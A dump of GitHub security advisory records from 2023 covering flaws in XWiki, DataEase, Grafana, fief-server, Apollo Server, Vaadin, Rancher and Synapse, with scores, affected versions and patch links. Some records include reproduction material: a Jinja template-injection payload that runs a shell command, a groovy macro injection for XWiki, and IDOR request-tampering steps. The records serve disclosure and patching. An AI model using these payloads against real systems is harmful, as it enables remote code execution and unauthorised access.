This vulnerability exists since XWiki 6.0-rc-1.
### Patches
The vulnerability has been patched in XWiki 14.10.6 and 15.1. Note that a partial patch has been provided in 14.10.5 but wasn't enough to entirely fix the vulnerability.
### Workarounds
It's possible to workaround the vulnerability by editing the template delete.vm to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets.
### References
* Jira ticket about the original vulnerability: https://jira.xwiki.org/browse/XWIKI-20341
* Commit containing the first fix in the template: https://github.com/xwiki/xwiki-platform/commit/e80d22d193df364b07bab7925572720f91a8984a
* Jira ticket about the second part of the vulnerability found after 14.10.5: https://jira.xwiki.org/browse/XWIKI-20672
* Commits containing the second fix in the template:
* https://github.com/xwiki/xwiki-platform/commit/13875a6437d4525ac4aeea25918f2d2dffac9ee1
* https://github.com/xwiki/xwiki-platform/commit/24ec12890ac7fa6daec8d0b3435cfcba11362fd5
* Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
### Attribution
This vulnerability has been reported by René de Sain @renniepak. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0-rc-1'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-0'}, {'fixed': '15.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-834c-x29c-f42c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35156'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/13875a6437d4525ac4aeea25918f2d2dffac9ee1'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/24ec12890ac7fa6daec8d0b3435cfcba11362fd5'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/e80d22d193df364b07bab7925572720f91a8984a'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20341'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20583'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20672'}] | {'cwe_ids': ['CWE-79', 'CWE-87'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T19:59:10Z', 'nvd_published_at': None} |
1.4.0 | GHSA-7hv6-gv38-78wj | 2023-06-02T17:09:17Z | 2023-06-02T17:09:17Z | null | ['CVE-2023-32310'] | DataEase API interface has IDOR vulnerability | ### Impact
The api interface for DataEase delete dashboard and delete system messages is vulnerable to IDOR.
The interface to delete the dashboard:
1. Create two users: user1 and user2
2. User1 creates a dashboard named pan1
3. User2 creates a dashboard named pan2
4. Both user1 and user2 share their dashboards with the demo user
5. User1 wants to delete his dashboard. We hijack the request with burpsuite. The request will probably look like this: POST /api/share/removePanelShares/440efa7f-efd8-11ed-bec7-1144724bc08c HTTP/1.1. 440efa7f-efd8-11ed-bec7-1144724bc08c is the ID of pan1
6. We replace this ID with the ID of pan2 and continue the execution (i.e. we delete the shares of others)
7. Successfully remove the shared link
![image](https://user-images.githubusercontent.com/985347/238271028-d23a9ca3-cd77-42a2-9199-a28ef03f5bf0.png)
The interface to delete system messages:
1. Our request to delete a message is shown below
![image](https://user-images.githubusercontent.com/985347/238271474-1bf6be85-7a39-436d-b209-ac88bf52b591.png)
2. We can delete all messages by simply enumerating the message ID, regardless of whether the message belongs to the requester or not.
3. The interface for marking read messages is also affected
Affected versions: <= 1.18.6
### Patches
The vulnerability has been fixed in v1.18.7.
### Workarounds
It is recommended to upgrade the version to v1.18.7.
### References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'io.dataease:dataease-plugin-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.18.6'}}] | [{'type': 'WEB', 'url': 'https://github.com/dataease/dataease/security/advisories/GHSA-7hv6-gv38-78wj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32310'}, {'type': 'WEB', 'url': 'https://github.com/dataease/dataease/pull/5342'}, {'type': 'WEB', 'url': 'https://github.com/dataease/dataease/commit/72f428e87b5395c03d2f94ef6185fc247ddbc8dc'}, {'type': 'PACKAGE', 'url': 'https://github.com/dataease/dataease'}, {'type': 'WEB', 'url': 'https://github.com/dataease/dataease/releases/tag/v1.18.7'}] | {'cwe_ids': ['CWE-639'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-02T17:09:17Z', 'nvd_published_at': None} |
1.4.0 | GHSA-mpv3-g8m3-3fjc | 2023-06-23T21:38:39Z | 2023-06-22T21:30:49Z | null | ['CVE-2023-3128'] | Grafana vulnerable to Authentication Bypass by Spoofing | Grafana is validating Azure AD accounts based on the email claim.
On Azure AD, the profile email field is not unique and can be easily modified.
This leads to account takeover and authentication bypass when Azure AD OAuth is configured with a multi-tenant app.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.0'}, {'fixed': '9.4.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.0'}, {'fixed': '9.3.16'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.20'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.27'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/grafana/bugbounty/security/advisories/GHSA-gxh2-6vvc-rrgp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3128'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/blob/69fc4e6bc0be2a82085ab3885c2262a4d49e97d8/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://grafana.com/security/security-advisories/cve-2023-3128/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230714-0004/'}] | {'cwe_ids': ['CWE-290'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:38:39Z', 'nvd_published_at': None} |
1.4.0 | GHSA-hj8m-9fhf-v7jp | 2023-06-23T21:46:11Z | 2023-06-23T21:46:11Z | null | [] | fief-server Server-Side Template Injection vulnerability | # Server-Side Template Injection
## Overview of the Vulnerability
Server-Side Template Injection (SSTI) is a vulnerability within application templating engines where user input is improperly handled and is embedded into the template, possibly leading code being executed.
An attacker can use SSTI to execute code on the underlying system by manipulating values within the embedded template. When code is executed within the underlying system, it can allow an attacker to run permissioned commands under the exploited process, or exploit Cross-Site Scripting (XSS) to run code within the user's browser.
## Business Impact
SSTI can lead to reputational damage for the business due to a loss in confidence and trust by users. If an attacker successfully executes code within the underlying system, it can result in data theft and indirect financial losses.
## Steps to Reproduce
1. [Sign up](https://fief.fief.dev/register) and login to your account
1. Use a browser to navigate to: email-templates {{[URL](https://test.fief.dev/admin/customization/email-templates/)}}
1. put your payload in Edit Base template `{{ cycler.__init__.__globals__.os.popen('id').read() }}` and you will se it will execute.
Payload:
`{{ cycler.__init__.__globals__.os.popen('id').read() }}`
## Proof of Concept (PoC)
The screenshot(s) below demonstrates the SSTI:
![SSTI](https://user-images.githubusercontent.com/42150485/248214990-854c2272-4f34-4c49-9759-d49ce8ce3d12.png)
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'fief-server'}, 'ecosystem_specific': {'affected_functions': ['fief.apps.dashboard.routers.email_templates.update_email_template', 'fief.services.email_template.renderers.EmailTemplateRenderer._get_jinja_environment', 'fief.services.email_template.renderers.EmailSubjectRenderer._get_jinja_environment']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.19.0'}, {'fixed': '0.25.3'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/fief-dev/fief/security/advisories/GHSA-hj8m-9fhf-v7jp'}, {'type': 'WEB', 'url': 'https://github.com/fief-dev/fief/commit/91e56625b641fa419e2985772266774bae18382b'}, {'type': 'PACKAGE', 'url': 'https://github.com/fief-dev/fief'}, {'type': 'WEB', 'url': 'https://github.com/fief-dev/fief/releases/tag/v0.25.3'}] | {'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:46:11Z', 'nvd_published_at': None} |
1.4.0 | GHSA-h7cw-44vp-jq7h | 2023-06-28T16:33:19Z | 2023-06-20T19:55:36Z | null | ['CVE-2023-35166'] | XWiki Platform vulnerable to privilege escalation (PR) from account through TipsPanel | ### Impact
It's possible to execute any wiki content with the right of the TipsPanel author by creating a tip UI extension.
To reproduce:
* Add an object of type UIExtensionClass
* Set "Extension Point ID" to org.xwiki.platform.help.tipsPanel
* Set "Extension ID" to org.xwiki.platform.user.test (needs to be unique but otherwise doesn't matter)
* Set "Extension Parameters" to
```
tip={{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + "from groovy!"){{/groovy}}{{/async}}
```
* Set "Extension Scope" to "Current User".
* Click "Save & View"
* Open the "Help.TipsPanel" document at <xwiki-host>/xwiki/bin/view/Help/TipsPanel where <xwiki-host> is the URL of your XWiki installation and press refresh repeatedly.
The groovy macro is executed, after the fix you get an error instead.
### Patches
This has been patched in XWiki 15.1-rc-1 and 14.10.5.
### Workarounds
There are no known workarounds for it.
### References
* https://jira.xwiki.org/browse/XWIKI-20281
* https://github.com/xwiki/xwiki-platform/commit/98208c5bb1e8cdf3ff1ac35d8b3d1cb3c28b3263#diff-4e3467d2ef3871a68b2f910e67cf84531751b32e0126321be83c0f1ed5d90b29L176-R178
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org) | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-help-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1-milestone-1'}, {'fixed': '14.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-help-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1-rc-1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h7cw-44vp-jq7h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35166'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/98208c5bb1e8cdf3ff1ac35d8b3d1cb3c28b3263#diff-4e3467d2ef3871a68b2f910e67cf84531751b32e0126321be83c0f1ed5d90b29L176-R178'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20281'}] | {'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T19:55:36Z', 'nvd_published_at': None} |
1.4.0 | GHSA-68jh-rf6x-836f | 2023-06-20T19:50:40Z | 2023-06-16T19:40:53Z | null | [] | @apollo/server vulnerable to unsafe application of Content Security Policy via reused nonces | ### Context
Content Security Policies (CSP) are a defense-in-depth strategy against XSS attacks. Improper application of CSP isn't itself a vulnerability, but it does fail to prevent XSS in the event that there is a viable attack vector for an XSS attack.
### Impact
There aren't any XSS attack vectors via the Apollo Server landing pages _known to Apollo_, so to our knowledge there is no impact. However, if there are existing XSS vectors that haven't been reported and patched, then all users of Apollo Server's landing pages have a vulnerability which won't be prevented by the current CSP implemented by the landing pages.
Prior to version 4.7.1, there was no CSP implemented at all. However, the initial CSP implementation (4.7.1+) reused nonces. While this sufficiently resolved the issue w.r.t. scripts not running in Safari, it did not implement CSP in a safe or conventional way.
### Patches
The issue is patched in the latest version of Apollo Server, v4.7.4. The changes can be reviewed in [the merge commit](https://github.com/apollographql/apollo-server/commit/0adaf80d1ee51d8c7e5fd863c04478536d15eb8c).
### Workarounds
The landing page can be disabled completely until the patch can be upgraded to.
https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/#disabling-the-landing-page
### References
https://content-security-policy.com/nonce/ | [] | [{'package': {'ecosystem': 'npm', 'name': '@apollo/server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7.1'}, {'fixed': '4.7.4'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/security/advisories/GHSA-68jh-rf6x-836f'}, {'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/commit/0adaf80d1ee51d8c7e5fd863c04478536d15eb8c'}, {'type': 'PACKAGE', 'url': 'https://github.com/apollographql/apollo-server'}] | {'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:40:53Z', 'nvd_published_at': None} |
1.4.0 | GHSA-8g9c-c9cm-9c56 | 2023-06-20T16:46:29Z | 2023-06-20T16:46:29Z | null | ['CVE-2023-35151'] | XWiki Platform may show email addresses in clear in REST results | ### Impact
Any user can call a REST endpoint and obtain the obfuscated passwords (even when the mail obfuscation is activated).
For instance, by calling http://localhost:8080/xwiki/rest/wikis/xwiki/spaces/XWiki/pages/U1/objects/XWiki.XWikiUsers/0 when user `U1` exists on wiki `xwiki`.
### Patches
The issue has been patched on XWiki 14.4.8, 14.10.6, and 15.1
### Workarounds
There is no known workaround. It is advised to upgrade to one of the patched versions.
### References
- https://jira.xwiki.org/browse/XWIKI-16138
- https://github.com/xwiki/xwiki-platform/commit/824cd742ecf5439971247da11bfe7e0ad2b10ede
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rest-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.3-milestone-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rest-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rest-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8g9c-c9cm-9c56'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35151'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/824cd742ecf5439971247da11bfe7e0ad2b10ede'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-16138'}] | {'cwe_ids': ['CWE-359', 'CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:46:29Z', 'nvd_published_at': None} |
1.4.0 | GHSA-7f2f-pcv3-j2r7 | 2023-06-20T16:45:12Z | 2023-06-20T16:45:12Z | null | ['CVE-2023-34466'] | XWiki Platform's tags on non-viewable pages can be revealed to users | ### Impact
Tags from pages not viewable to the current user are leaked by the tags API.
This information can also be exploited to infer the document reference of non-viewable pages.
### Patches
This vulnerability has been patched in XWiki 14.4.8, 14.10.4, and 15.0 RC1.
### Workarounds
There is no workaround apart from upgrading to a fixed version.
### References
- https://jira.xwiki.org/browse/XWIKI-20002
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org) | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-tag-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0-milestone-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-tag-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.4'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7f2f-pcv3-j2r7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34466'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20002'}] | {'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:45:12Z', 'nvd_published_at': None} |
1.4.0 | GHSA-5f9v-mv5g-jh5q | 2023-06-22T20:01:11Z | 2023-06-22T20:01:11Z | null | ['CVE-2023-25499'] | Vaadin vulnerable to possible information disclosure in non visible components. | ### Description
When adding non-visible components to the UI in server side, content is sent to the browser in Vaadin 10.0.0 through 10.0.22, 11.0.0 through 14.10.0, 15.0.0 through 22.0.28, 23.0.0 through 23.3.12, 24.0.0 through 24.0.5 and 24.1.0.alpha1 to 24.1.0.beta1, resulting in potential information disclosure.
* https://vaadin.com/security/cve-2023-25499 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.23'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '14.10.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '23.0.0'}, {'fixed': '23.3.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0'}, {'fixed': '24.0.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.1.0.alpha1'}, {'fixed': '24.1.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.20'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '2.8.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '9.1.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '23.0.0'}, {'fixed': '23.3.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0'}, {'fixed': '24.0.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.1.0.alpha1'}, {'fixed': '24.1.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-5f9v-mv5g-jh5q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25499'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/15885'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/platform'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/CVE-2023-25499'}] | {'cwe_ids': ['CWE-200', 'CWE-201'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:11Z', 'nvd_published_at': None} |
1.4.0 | GHSA-8vhc-hwhc-cpj4 | 2023-06-06T01:59:31Z | 2023-06-06T01:59:31Z | null | ['CVE-2020-10676'] | Rancher users retain access after moving namespaces into projects they don't have access to | ### Impact
A vulnerability was identified in which users with update privileges on a namespace, can move that namespace into a project they don't have access to. After the namespace transfer is completed, their previous permissions are still preserved, which enables them to gain access to project-specific resources (such as [project secrets](https://ranchermanager.docs.rancher.com/how-to-guides/new-user-guides/kubernetes-resources-setup/secrets#creating-secrets-in-projects)). In addition, resources in the namespace will now count toward the [quota limit](https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/manage-projects/manage-project-resource-quotas/about-project-resource-quotas) of the new project, potentially causing availability issues.
User with roles `Project Owner` and `Project Member` on the source project can exploit this vulnerability; however, this would also apply to custom roles with similar privileges.
The patched version include an improved RBAC mechanism, which checks if the user has the correct permissions before the namespace move takes place.
### Patches
Patched versions include releases `2.6.13`, `2.7.4` and later versions.
### Workarounds
There is no direct mitigation besides updating Rancher to a patched version.
### For more information
If you have any questions or comments about this advisory:
- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.
- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.
- Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/). | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.4'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/rancher/rancher/security/advisories/GHSA-8vhc-hwhc-cpj4'}, {'type': 'PACKAGE', 'url': 'https://github.com/rancher/rancher'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/releases/tag/v2.6.13'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/releases/tag/v2.7.4'}] | {'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:59:31Z', 'nvd_published_at': None} |
1.4.0 | GHSA-26c5-ppr8-f33p | 2023-06-07T13:50:03Z | 2023-06-06T16:40:42Z | null | ['CVE-2023-32682'] | Synapse has improper checks for deactivated users during login | ### Impact
It may be possible for a deactivated user to login when using uncommon configurations.
This only applies if any of the following are true:
* [JSON Web Tokens are enabled for login](https://matrix-org.github.io/synapse/latest/jwt.html) via the `jwt_config.enabled` configuration setting
* The [local password database is enabled](https://matrix-org.github.io/synapse/latest/usage/configuration/config_documentation.html#password_config) via the `password_config.enabled` and `password_config.localdb_enabled` configuration settings *and* a user's password is [updated via an admin API](https://matrix-org.github.io/synapse/latest/admin_api/user_admin_api.html#create-or-modify-account) after a user is deactivated.
**Note that the local password database is enabled by default**, but it is uncommon to set a user's password after they've been deactivated.
Installations that are configured to only allow login via Single Sign-On (SSO) via CAS, SAML or OpenID Connect (OIDC); or via an external password provider (e.g. LDAP) are not affected.
### Patches
* If using JSON Web Token logins: #15624
* For other users: #15634
### Workarounds
If not using JSON Web Tokens, ensure that deactivated users do not have a password set. This list of users can be queried from PostgreSQL:
```sql
SELECT name FROM users WHERE password_hash IS NOT NULL AND deactivated = 1;
```
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.85.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-26c5-ppr8-f33p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32682'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/issues/12274'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/15624'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/15634'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.85.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/matrix-synapse/PYSEC-2023-84.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6DH5A5YEB5LRIPP32OUW25FCGZFCZU2/'}, {'type': 'WEB', 'url': 'https://matrix-org.github.io/synapse/latest/admin_api/user_admin_api.html#create-or-modify-account'}, {'type': 'WEB', 'url': 'https://matrix-org.github.io/synapse/latest/jwt.html'}, {'type': 'WEB', 'url': 'https://matrix-org.github.io/synapse/latest/usage/configuration/config_documentation.html#password_config'}] | {'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:40:42Z', 'nvd_published_at': None} |
1.4.0 | GHSA-8q9q-r9v2-644m | 2023-06-30T20:42:07Z | 2023-06-30T20:42:07Z | null | ['CVE-2023-36468'] | Upgrading doesn't prevent exploiting vulnerable XWiki documents | ### Impact
When an XWiki installation is upgraded and that upgrade contains a fix for a bug in a document, just a new version of that document is added. In some cases, it's still possible to exploit the vulnerability that was fixed in the new version. The severity of this depends on the fixed vulnerability, for the purpose of this advisory take [CVE-2022-36100](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2g5c-228j-p52x) as example - it is easily exploitable with just view rights and critical. When XWiki is upgraded from a version before the fix for it (e.g., 14.3) to a version including the fix (e.g., 14.4), the vulnerability can still be reproduced by adding `rev=1.1` to the URL used in the reproduction steps so remote code execution is possible even after upgrading. Therefore, this affects the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability also affects manually added script macros that contained security vulnerabilities that were later fixed by changing the script macro without deleting the versions with the security vulnerability from the history.
This vulnerability doesn't affect freshly installed versions of XWiki. Further, this vulnerability doesn't affect content that is only loaded from the current version of a document like the code of wiki macros or UI extensions.
### Patches
This vulnerability has been patched in XWiki 14.10.7 and 15.2RC1 by forcing old revisions to be executed in a restricted mode that disables all script macros.
### Workarounds
As a workaround, admins can manually delete old revisions of affected documents. A script could be used to identify all installed documents and delete the history for them. However, also manually added and later corrected code may be affected by this vulnerability so it is easy to miss documents.
### References
* https://jira.xwiki.org/browse/XWIKI-20594
